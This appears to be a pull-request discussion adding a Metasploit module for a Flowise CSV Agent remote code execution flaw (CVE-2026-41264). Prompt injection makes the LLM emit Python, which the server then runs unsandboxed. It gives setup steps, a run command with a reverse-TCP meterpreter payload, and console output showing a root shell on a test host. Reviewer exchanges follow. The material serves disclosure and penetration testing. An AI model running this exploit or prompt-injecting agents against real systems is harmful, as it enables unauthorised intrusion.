Add Flowise CSV Agent Prompt Injection RCE module (CVE-2026-41264)

[Takahiro-Yoko]

CVE-2026-41264
GHSA-3hjv-c53m-58jj

Vulnerable Application

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the run method of the CSV_Agents class.
The issue results from the lack of proper sandboxing when evaluating an LLM generated python script.
An attacker can leverage this vulnerability to execute code in the context of the user running the server.

The vulnerability affects:

*  flowise <= 3.0.13
*  flowise-components <= 3.0.13

This module was successfully tested on:

* flowise 3.0.13 installed with Docker

Installation

1. docker run --name flowise -p 3000:3000 flowiseai/flowise:3.0.13

2. On an attacker machine

curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1

3. Create API Key (need chatflows:create permission for exploit to work)

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
4. Do: run lhost=<lhost> rhost=<rhost> apikey=<apikey> ollamaapiuri=<ollamaapiuri> model=<model>
5. You should get a meterpreter

Scenarios

cmd/linux/http/x64/meterpreter_reverse_tcp

msf > use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > run apikey=<apikey> rhost=192.168.56.17 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434  model=llama3.1
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Flowise version 3.0.13 detected
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33468) at 2026-05-05 14:09:24 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : acc229b14e46
OS           :  (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[msutovsky-r7]

Is there a lower bound?

[Takahiro-Yoko]

Thanks! Although this has not been explicitly tested (yet), there appears to be no lower bound.

[Takahiro-Yoko]

It seems that the CSV Agent was first introduced in Flowise version 1.3.0, so the theoretical lower bound is 1.3.0.
Updated. dc9dd26 Thanks!

history

commit

[msutovsky-r7]

Do we need to check the response here?

[Takahiro-Yoko]

Thanks! Updated. 8f03671

[msutovsky-r7]

If it can be nil, does it have to be mandatory?

[Takahiro-Yoko]

Good catch. I didn't realize that setting an empty string as the default value bypasses the required option check. These options are all mandatory, so I've removed the default empty values. 45394b3 Thanks!

[msutovsky-r7]

Is there a way to spoof the traffic between Ollama and Flowise? Asking because it might make module more usable and currently getting this error:

Error: predictionsServices.buildChatflow - fetch failed

[Takahiro-Yoko]

I haven't tested traffic spoofing between Ollama and Flowise, but standard interception/proxy tools may work.

Regarding the predictionsServices.buildChatflow - fetch failed error, please make sure that OLLAMAAPIURI includes the correct Ollama host and port. Since Ollama uses port 11434 by default, you may need to set it to:

http://<your_ollama_server_ip>:11434

For troubleshooting, it may also help to temporarily comment out the cleanup code so that you can inspect the created resources after the module runs.

Then:

1. Open Flowise.
2. Verify that the chatflow was created successfully.

3. Check the chatflow configuration and confirm that the Ollama endpoint is set as expected.